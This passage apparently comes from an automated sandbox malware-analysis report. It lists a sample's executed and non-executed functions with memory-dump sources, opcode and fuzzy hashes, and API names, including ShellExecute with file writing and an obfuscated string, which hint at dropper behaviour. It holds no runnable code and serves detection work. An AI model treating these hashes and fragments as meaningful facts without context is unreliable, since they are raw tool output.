                                                              • Opcode ID: 77f5136433f5e37ad038e6b2514d4503f8d23944bbd42dca42504bdb9c0fb1fc
                                                              • Instruction ID: c08cea38a9337d20b03c0110e7630d5973bb492c4bced0d9a478faa9d9a35275
                                                              • Opcode Fuzzy Hash: 77f5136433f5e37ad038e6b2514d4503f8d23944bbd42dca42504bdb9c0fb1fc
                                                              • Instruction Fuzzy Hash: EB312431A1CB884FDB1CDB5C9C066A97BF0FBA9310F00426FE449C3292CA71A855CBC2
                                                              Function 00007FFD9ACFE383 Relevance: .1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1929583090.00007FFD9ACFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ACFD000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8855e00b7bd541799e42c29d9f4e0b412ecf4c21f0c235a97d9284fefdca7462
                                                              • Instruction ID: ad5b66044a3fdf19e37fe887a493227a115c20ff0748903d66d19d093fdbdba1
                                                              • Opcode Fuzzy Hash: 8855e00b7bd541799e42c29d9f4e0b412ecf4c21f0c235a97d9284fefdca7462
                                                              • Instruction Fuzzy Hash: 9741457150DBC44FE75A8B3CA8559523FF0EF56324B1901EFD088CF1A3D625A80AC792
                                                              Function 00007FFD9AE1BD7D Relevance: .1, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1932544897.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5439e898114ae4ae892a1f2f4720f96c42274bce90b14fa6d4f1fc07dd73f080
                                                              • Instruction ID: 70c349c8c881fc9b87a71479ddde713d632d297a811d00d3f05b7aadc0c943fd
                                                              • Opcode Fuzzy Hash: 5439e898114ae4ae892a1f2f4720f96c42274bce90b14fa6d4f1fc07dd73f080
                                                              • Instruction Fuzzy Hash: EA31497161CB884FDB5ADF6CC85A6E57BE0EF52324F0442AFD0A8C7093DA21A416C752
                                                              Function 00007FFD9AE133B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1932544897.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f52f075e1a068889940d64c93eb92417e897d78ce1085801ced2499207c853b
                                                              • Instruction ID: 06d2ac2465ae7b617642e4c06c1169199b8a441424157cf7d8c5b868efba0901
                                                              • Opcode Fuzzy Hash: 1f52f075e1a068889940d64c93eb92417e897d78ce1085801ced2499207c853b
                                                              • Instruction Fuzzy Hash: CA01A73120CB0C4FDB48EF0CE051AA5B3E0FB85324F10056EE58AC3691DA32E882CB45
                                                              Function 00007FFD9AE1A1FB Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1932544897.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9031f363d45df43765386972b2ed276f05846338031e7a609c5e16450c93c29f
                                                              • Instruction ID: bc219c177e16578edaccc6a481f57e51fa589165b846e730d08905b3122d4109
                                                              • Opcode Fuzzy Hash: 9031f363d45df43765386972b2ed276f05846338031e7a609c5e16450c93c29f
                                                              • Instruction Fuzzy Hash: EEF02B73A05A8C9FD745EF1C98654E97BA0FF6530170403BBE458C7061DB269404C7C1
                                                              Function 00007FFD9AEE432D Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1933338354.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ee6c082ebdb1a1ce958443d0262e83da87aef5cf0be3f45a803e240e62bafde
                                                              • Instruction ID: 658836689c41cd37e682a855580f2db1e3d3d9083321a0e0c1e45f22ea933b93
                                                              • Opcode Fuzzy Hash: 7ee6c082ebdb1a1ce958443d0262e83da87aef5cf0be3f45a803e240e62bafde
                                                              • Instruction Fuzzy Hash: F0F09A32B0C5458FD76CEB4CA4518A873E0EF85320B2100FAE06DC75A3CA2AEC41C740
                                                              Function 00007FFD9AEE45E0 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1933338354.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3822dd44534b2a329f4708b2799a69ed91c1d7c655e2785257441cce9e69528c
                                                              • Instruction ID: 43d081ecd27bedb82945d1a1d41e48843710c158e4afb5a181f3cc3e5e68f141
                                                              • Opcode Fuzzy Hash: 3822dd44534b2a329f4708b2799a69ed91c1d7c655e2785257441cce9e69528c
                                                              • Instruction Fuzzy Hash: 2FF05832B0D5458FDBA9EB9CE4618A877E0EF05321B2500F6E16DCB5A3CA2AAC45C750

                                                              Non-executed Functions

                                                              Function 00007FFD9AE1851B Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1932544897.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                              • API String ID: 0-2396788759
                                                              • Opcode ID: 98d42551d9a19b48bb84685f5bdd2d366cf335d8011fc5504dc1b824ba32b29e
                                                              • Instruction ID: c09c6bfe876f2970a2c23447aefbedde8f22abc5792ea18b0fdd9a35aa5dee1d
                                                              • Opcode Fuzzy Hash: 98d42551d9a19b48bb84685f5bdd2d366cf335d8011fc5504dc1b824ba32b29e
                                                              • Instruction Fuzzy Hash: 18317093F0F6E26FF66A297958794DA3FE0FE6275870A12F7C0D446093B90A28079251
                                                              Function 00007FFD9AE186FA Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1932544897.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^$M_^$M_^$M_^
                                                              • API String ID: 0-1397233021
                                                              • Opcode ID: abb7a20ae5ce51b00092104509261bd2c6c5d579b8f2acaccda320fafd0bdd97
                                                              • Instruction ID: a901e21848e4788108a2133b6de4b52f37676148b9f9f64021ffa5ac39a2bcac
                                                              • Opcode Fuzzy Hash: abb7a20ae5ce51b00092104509261bd2c6c5d579b8f2acaccda320fafd0bdd97
                                                              • Instruction Fuzzy Hash: BE318293F0F6EA9FE76B26695C754E53FD0AF22654B0E02F3C4D8DA093FD0928468211

                                                              Executed Functions

                                                              Function 00401475 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1702229491.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000F.00000002.1702208176.0000000000400000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                              • Associated: 0000000F.00000002.1702256229.0000000000402000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                              • Associated: 0000000F.00000002.1702479644.000000000069F000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                              • String ID:
                                                              • API String ID: 3649950142-0
                                                              • Opcode ID: 8b976675595980e0721631a0cac2b200b7ff98780fa45e4d4fb397b73b1d0b15
                                                              • Instruction ID: fb524d98552666cdbc3a02e24bb2f35b804011e51e25cbf5b35a92565c8a3c04
                                                              • Opcode Fuzzy Hash: 8b976675595980e0721631a0cac2b200b7ff98780fa45e4d4fb397b73b1d0b15
                                                              • Instruction Fuzzy Hash: 5111FAF5E00104BBCB00EBA8EC86F5A77ADAB48304F10447BB905E73A1E979E944C765
                                                              Function 0040108C Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 207filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1702229491.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000F.00000002.1702208176.0000000000400000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                              • Associated: 0000000F.00000002.1702256229.0000000000402000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                              • Associated: 0000000F.00000002.1702479644.000000000069F000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                              Similarity
                                                              • API ID: memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                              • String ID: ! @$%s\%s$& @$0 @
                                                              • API String ID: 1891165703-3773868540
                                                              • Opcode ID: 0e66471549e700d7624834bb79b0310eabc25696931cb33b101cc378bebd2a8a
                                                              • Instruction ID: 230f2211f9ee4ee4b08a9b64e3b095bbff250e09df6954d67dba9b12115b54ef
                                                              • Opcode Fuzzy Hash: 0e66471549e700d7624834bb79b0310eabc25696931cb33b101cc378bebd2a8a
                                                              • Instruction Fuzzy Hash: F07125F1E011049BEB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E638AA44CB59
                                                              Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • gf.rw/d^d_/kgs,t98[yii316l=yau-5, xrefs: 0040106E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1702229491.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000F.00000002.1702208176.0000000000400000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                              • Associated: 0000000F.00000002.1702256229.0000000000402000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                              • Associated: 0000000F.00000002.1702479644.000000000069F000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: gf.rw/d^d_/kgs,t98[yii316l=yau-5
                                                              • API String ID: 2803490479-240670562
                                                              • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                              • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                              • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                              • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45